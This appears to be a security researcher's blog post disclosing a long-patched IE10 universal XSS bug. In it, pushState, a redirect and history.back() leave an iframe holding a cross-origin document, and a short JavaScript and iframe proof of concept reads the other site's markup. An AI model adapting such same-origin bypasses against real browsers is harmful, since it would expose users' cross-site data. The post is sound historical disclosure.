IE10 UXSS: pushState + Redirect + history.back() Retains Cross-Origin DOM Access

I found that pushing a redirect URL into an iframe’s history with pushState, reloading to complete the redirect, then calling history.back() on the top window left the iframe appearing to belong to dummy.html (its original URL) while actually containing the cross-origin document. The document.URL and document.domain still showed the old origin, but document.all[0].outerHTML belonged to the redirected cross-origin page.

function main()
{
    iFrame.history.pushState("","","redirect.aspx");
    iFrame.location.reload(); // This redirects the iframe to bing.com.
    setTimeout("goBackAndReadContents()", 4000);
}
function goBackAndReadContents()
{
    history.back(); // Appears to go back, but iframe stays at bing.com.
    alert(iFrame.document.all[0].outerHTML); // Reads bing.com DOM.
}

<iframe name="iFrame" src="dummy.html" width="700" height="80"></iframe>

After the reload loaded Bing into the iframe, history.back() on the top window reset the history entry but did not actually navigate the iframe back. The iframe’s document object reported dummy.html as its URL, but the DOM elements it contained were Bing’s — allowing outerHTML to expose cross-origin markup.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [IE10 Metro: Loading mhtml from Sandboxed iframe Breaks Out to Top Window Without Showing Address Bar] :: [IE10 DoS: pushState to mhtml: URL Then window.open Crashes in urlmon StrCmpCW] >